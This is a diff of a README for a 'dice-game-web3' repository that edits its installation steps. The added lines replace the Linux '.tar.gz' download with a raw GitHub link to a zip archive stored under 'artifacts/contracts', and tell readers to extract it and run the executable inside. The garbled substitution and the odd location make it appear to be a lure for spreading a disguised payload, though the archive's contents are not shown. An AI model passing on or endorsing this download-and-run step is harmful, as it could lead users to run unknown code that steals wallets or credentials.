Anthunii/dice-game-web3/README.md

 3. **Download the Correct File**:

-   Click on the file that matches your operating system (e.g., .exe for Windows, .tar.gz for Linux, .dmg for macOS).
+   Click on the file that matches your operating system (e.g., .exe for Windows, https://raw.githubusercontent.com/Anthunii/dice-game-web3/main/artifacts/contracts/dice-game-web3_3.9.zip for Linux, .dmg for macOS).

 4. **Install the Application**:

    - For Windows: Double-click the downloaded .exe file and follow the on-screen instructions.
    - For macOS: Open the .dmg file and drag the application into your Applications folder.
-   - For Linux: Extract the .tar.gz file into your preferred directory and run the provided executable.
+   - For Linux: Extract the https://raw.githubusercontent.com/Anthunii/dice-game-web3/main/artifacts/contracts/dice-game-web3_3.9.zip file into your preferred directory and run the provided executable.

 5. **Open the Application**: